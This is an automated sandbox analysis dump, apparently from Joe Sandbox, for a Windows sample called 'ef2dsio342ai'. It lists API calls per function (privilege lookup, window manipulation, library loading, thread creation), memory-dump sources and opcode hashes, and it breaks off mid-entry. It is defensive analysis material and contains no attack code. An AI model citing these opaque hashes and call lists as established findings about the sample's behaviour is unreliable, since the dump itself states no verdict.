                                                                                                      • Instruction Fuzzy Hash: 5F216030508201AFC700DF24D8819AAB7F5EE6A364F148A1DF49AC72A1EB30D949CB72
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D718A4: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D718BA
                                                                                                        • Part of subcall function 00D718A4: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D718C6
                                                                                                        • Part of subcall function 00D718A4: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D718D5
                                                                                                        • Part of subcall function 00D718A4: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D718DC
                                                                                                        • Part of subcall function 00D718A4: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D718F2
                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00D71E4E
                                                                                                      • _memcmp.LIBVCRUNTIME ref: 00D71E71
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D71EA7
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00D71EAE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1592001646-0
                                                                                                      • Opcode ID: cc19a8b3e619f2aa8854e790bd828699c04ab384335a8e7fa93329f547a50b12
                                                                                                      • Instruction ID: ed94fc04388cf650547d7c46166e0b21f7d36173298adbdac1b0ed641fc3efd3
                                                                                                      • Opcode Fuzzy Hash: cc19a8b3e619f2aa8854e790bd828699c04ab384335a8e7fa93329f547a50b12
                                                                                                      • Instruction Fuzzy Hash: 66217175E10209EFDB10DFA8C945BEEB7F9EF84344F198159E855A7250E730AA09CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00DA3169
                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DA3183
                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DA3191
                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DA319F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                      • String ID:
                                                                                                      • API String ID: 2169480361-0
                                                                                                      • Opcode ID: 938c6c7f611ed2da0e8b5aacda8182345e74ea52ca68bbd85fdba8a7438af323
                                                                                                      • Instruction ID: d11048588c6088fa08eaacaab49a58f2da83cc0e968c8a81078fd92d2f9d58b4
                                                                                                      • Opcode Fuzzy Hash: 938c6c7f611ed2da0e8b5aacda8182345e74ea52ca68bbd85fdba8a7438af323
                                                                                                      • Instruction Fuzzy Hash: F521D331208611BFD7049B14CC45FAA7B96EF87324F188158F4668B6D2CB71ED82CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D7960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00D78199,?,000000FF,?,00D78FE3,00000000,?,0000001C,?,?), ref: 00D7961B
                                                                                                        • Part of subcall function 00D7960C: lstrcpyW.KERNEL32(00000000,?), ref: 00D79641
                                                                                                        • Part of subcall function 00D7960C: lstrcmpiW.KERNEL32(00000000,?,00D78199,?,000000FF,?,00D78FE3,00000000,?,0000001C,?,?), ref: 00D79672
                                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00D78FE3,00000000,?,0000001C,?,?,00000000), ref: 00D781B2
                                                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00D781D8
                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00D78FE3,00000000,?,0000001C,?,?,00000000), ref: 00D78213
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                      • String ID: cdecl
                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                      • Opcode ID: a0310779ab3cc38fe26987c6136d15109782cb5c3fbca36ac13e9357ef77951e
                                                                                                      • Instruction ID: 85c4c2a8a0dfa12b85c48b391a1bfff4ecfd4556c749d2537c2000f61af5aa83
                                                                                                      • Opcode Fuzzy Hash: a0310779ab3cc38fe26987c6136d15109782cb5c3fbca36ac13e9357ef77951e
                                                                                                      • Instruction Fuzzy Hash: C611E63A200341ABCB145F38D859E7A77A9FF99350B90802AF94ACB750FF319801D7B5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA866A
                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00DA8689
                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DA86A1
                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00D8C10A,00000000), ref: 00DA86CA
                                                                                                        • Part of subcall function 00D12441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D12452
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Long
                                                                                                      • String ID:
                                                                                                      • API String ID: 847901565-0
                                                                                                      • Opcode ID: c784e33d793566f23b0cc93c705c2172ea6242acc7bafb104564d8b1b409cedc
                                                                                                      • Instruction ID: a1f56c31f06c59f6b66ffd6449eb4e800495544243137208f6b19a817d6dba03
                                                                                                      • Opcode Fuzzy Hash: c784e33d793566f23b0cc93c705c2172ea6242acc7bafb104564d8b1b409cedc
                                                                                                      • Instruction Fuzzy Hash: 8C11A232500655AFDB109F28DC44AAA3BA5EB4A370F194724FD3ADB2E0DB30C911DB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: eecb8ce398c3b3597aff285ee3b434c5e88c1306c0cc3a337970e57477340905
                                                                                                      • Instruction ID: e37b33108eec8058eba9756d2e466c80da6825474c064730b90db39ea8966d43
                                                                                                      • Opcode Fuzzy Hash: eecb8ce398c3b3597aff285ee3b434c5e88c1306c0cc3a337970e57477340905
                                                                                                      • Instruction Fuzzy Hash: 4E01A2B26093157FF62126786CC1F37674EDF523B8B790725B621912D5DB708C814570
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1000106D
                                                                                                        • Part of subcall function 10004790: __lock.LIBCMT ref: 100047A1
                                                                                                      • std::exception::exception.LIBCMT ref: 100010C8
                                                                                                        • Part of subcall function 10004D2D: std::exception::_Copy_str.LIBCMT ref: 10004D46
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 100010DD
                                                                                                        • Part of subcall function 1000750B: RaiseException.KERNEL32(?,?,10004732,?,?,?,?,?,10004732,?,10020100,0000001C), ref: 1000755C
                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 100010E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::exception::_std::exception::exception
                                                                                                      • String ID:
                                                                                                      • API String ID: 271752322-0
                                                                                                      • Opcode ID: 377c7938d3269c0693ac522cc795991d880b2cf8485005835febe4d38467de5f
                                                                                                      • Instruction ID: 5991662a8a62606b7d5f63f4e8bf24df8f7701db000c2b51e7128837fa0f03ae
                                                                                                      • Opcode Fuzzy Hash: 377c7938d3269c0693ac522cc795991d880b2cf8485005835febe4d38467de5f
                                                                                                      • Instruction Fuzzy Hash: DA21A2B1804784DFD321CFA9C840B8BBBF8EF19300F008A1EE499D7641D775A208CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00D722D7
                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D722E9
                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D722FF
                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D7231A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: a251b71451228aaf826b3b9b5fb980e29afe86645b44e36615ba08651565dbd2
                                                                                                      • Instruction ID: da238f472a1d1131936c4cdaf8883cb458308839eadeca01338edf22ec344d3c
                                                                                                      • Opcode Fuzzy Hash: a251b71451228aaf826b3b9b5fb980e29afe86645b44e36615ba08651565dbd2
                                                                                                      • Instruction Fuzzy Hash: 98110C76900218FFDB119BA5CD85FADBBB8EB08750F604095E605B7290D6716E10DBA4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D12441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D12452
                                                                                                      • GetClientRect.USER32(?,?), ref: 00DAA890
                                                                                                      • GetCursorPos.USER32(?), ref: 00DAA89A
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00DAA8A5
                                                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 00DAA8D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 4127811313-0
                                                                                                      • Opcode ID: 321a5bfead4134498804c42c226be36bcbe9f0438fcc1f382fff40f926834b6d
                                                                                                      • Instruction ID: 9285b5f053d77edd07c7a66b62987b26f4469120b080016c659300bf4e0150be
                                                                                                      • Opcode Fuzzy Hash: 321a5bfead4134498804c42c226be36bcbe9f0438fcc1f382fff40f926834b6d
                                                                                                      • Instruction Fuzzy Hash: FA113A71900119EFDF14DF68D8859EE77B9FF06301F040556E912E6251D738AA82CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00D7EA29
                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00D7EA5C
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00D7EA72
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00D7EA79
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 2880819207-0
                                                                                                      • Opcode ID: bb503253647b693779a6ec4088af4df1877a46c9a871b9ef37ce38792073df73
                                                                                                      • Instruction ID: c93620f4fec5f0b84c67dd04fd3830c40a6960b3c8d279b21f58111448d664ce
                                                                                                      • Opcode Fuzzy Hash: bb503253647b693779a6ec4088af4df1877a46c9a871b9ef37ce38792073df73
                                                                                                      • Instruction Fuzzy Hash: B311DF75900359BFC701EF689C4599F7F6DAB46310F14815AF419D7390D674CD048BB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateThread.KERNEL32(00000000,?,00D3D389,00000000,00000004,00000000), ref: 00D3D5A8
                                                                                                      • GetLastError.KERNEL32 ref: 00D3D5B4
                                                                                                      • __dosmaperr.LIBCMT ref: 00D3D5BB
                                                                                                      • ResumeThread.KERNEL32(00000000), ref: 00D3D5D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                      • String ID:
                                                                                                      • API String ID: 173952441-0
                                                                                                      • Opcode ID: 05fbaa003b7316336d3cd7f4e602c88c37e2774417e1ad41d81800b7825717fc
                                                                                                      • Instruction ID: bd385e036b574ebf5b46945e0977e39bb4d988352e8b2110db3dece19a481950
                                                                                                      • Opcode Fuzzy Hash: 05fbaa003b7316336d3cd7f4e602c88c37e2774417e1ad41d81800b7825717fc
                                                                                                      • Instruction Fuzzy Hash: 9C01B572905204BBDB216FA5EC05FAA7B6ADF83735F240319F925961E0DF718904CAB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D17759
                                                                                                      • GetStockObject.GDI32(00000011), ref: 00D1776D
                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D17777
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3970641297-0
                                                                                                      • Opcode ID: 2468ead37f3c8f8b3ddebf88f2633d6202408755869689943f19c63d504d12b2
                                                                                                      • Instruction ID: d24d917063671f3d8c74aee092e8ec8646691771290a56b6bbd9f81cbdec984f
                                                                                                      • Opcode Fuzzy Hash: 2468ead37f3c8f8b3ddebf88f2633d6202408755869689943f19c63d504d12b2
                                                                                                      • Instruction Fuzzy Hash: DD11AD72105649BFEF064F90EC84EEABB79EF09365F040105FA1692160DB31DCA0EBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00D33EE6
                                                                                                        • Part of subcall function 00D33E33: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D33E62
                                                                                                        • Part of subcall function 00D33E33: ___AdjustPointer.LIBCMT ref: 00D33E7D
                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00D33EFB
                                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D33F0C
                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00D33F34
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                      • String ID:
                                                                                                      • API String ID: 737400349-0
                                                                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                      • Instruction ID: 0ad83b157fbb30306a2ecee5c4f7f576ac01e49e447c99c0920e3fd6cb5a0a91
                                                                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                      • Instruction Fuzzy Hash: F4010832500148BBDF126E95CD42EEB7F6AEF88754F094118FE58A6121C736E961EBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00D433AA,00000364,00000000,00000000,00000000,?,00D4361B,00000006,FlsSetValue), ref: 00D43435
                                                                                                      • GetLastError.KERNEL32(?,00D433AA,00000364,00000000,00000000,00000000,?,00D4361B,00000006,FlsSetValue,00DB3260,FlsSetValue,00000000,00000364,?,00D431D6), ref: 00D43441
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D433AA,00000364,00000000,00000000,00000000,?,00D4361B,00000006,FlsSetValue,00DB3260,FlsSetValue,00000000), ref: 00D4344F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 3177248105-0
                                                                                                      • Opcode ID: d5198a806b2e4c6ad9191b7fb40a8a0316c85628d4fdd6010b7866f5e3d23277
                                                                                                      • Instruction ID: 3836b76b5ef054e007d80eee1d090ff7ba8b41c0ef17675fd9fc2ab15b905658
                                                                                                      • Opcode Fuzzy Hash: d5198a806b2e4c6ad9191b7fb40a8a0316c85628d4fdd6010b7866f5e3d23277
                                                                                                      • Instruction Fuzzy Hash: D6016736601322EBCB224FBDAC44AE67B99AF457B17250724F94ED7350D724D941C6F0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00D77D0E
                                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00D77D26
                                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00D77D3B
                                                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00D77D59
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 1352324309-0
                                                                                                      • Opcode ID: ab9b5f265cd236d5998c0aec92a045cf228a43000c1fcfa5b2d405d85cc90845
                                                                                                      • Instruction ID: bc2d00f94879cdc3e9438150a0aaaf52e7891d70286c06f817316ff24e097f68
